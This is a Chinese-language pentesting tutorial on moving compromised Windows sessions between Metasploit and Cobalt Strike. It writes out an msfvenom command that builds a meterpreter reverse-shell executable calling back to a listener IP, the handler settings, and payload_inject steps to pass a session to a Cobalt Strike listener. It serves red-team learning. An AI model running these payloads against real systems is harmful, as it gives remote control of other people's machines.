msfconsole和Cs是我们最常用的两款渗透神器。每款工具都有自身的优点和缺点。如cs用于强悍的图形界面，完善的团队协作。但是功能上面就没有msfconsole强悍了。如何做到两者相互配合呢？

MSF上线给CS

当msf得到了会话的session。如何将其传递给cs呢？我们先用kali生成一个shell

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost= 192.168.123.74 lport= 5555 -f exe > kali.exe

在msf中配置监听

use exploit/multi/handler 
set payload windows/x64/meterpreter_reverse_tcp 
set lhost 192.168.123.74
set lport 5555
exploit 

配置cs

在CS中创建监听器监听器类型：windows/beacon_http/reverse_httpHost修改为对应cs的IP，监听指定端口，等待MSF发送。

从msf中转移会话到cs

#使当前会话到后台允许
background
# 使用payload_inject模块,执行之后会在本地产生一个新的Handler
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set LHOST <CS_IP>
set LPORT <CS_Port>  #这里的端口填写cs的端口
set session <Session_ID> #指定id
#设置MSF不启动监听,不然MSF会提示执行成功,但没有会话建立
set disablepayloadhandler true
run

运行后，我们到cs中就可以看到转移的会话了。

CS会话转移msf

我们先在msf中配置参数

use exploit/multi/handler
set payload windows/meterpreter/reverse_http # 不要用64位
set lhost <MSF_IP>
set lport <MSF_Port>   # 设置任意端口进行监听
run

然后再Cs中配置监听，效果如下：

在CS中右键会话，点击Spawn，选择MSF的监听器，成功得到会话。

后记

由于Cs版本等问题，在实际操作中可能存在一定的不同。需根据自身情况而定。另外本机仅供学习交流和研究，请勿用于非法等目录。

更多精彩文章 欢迎关注我们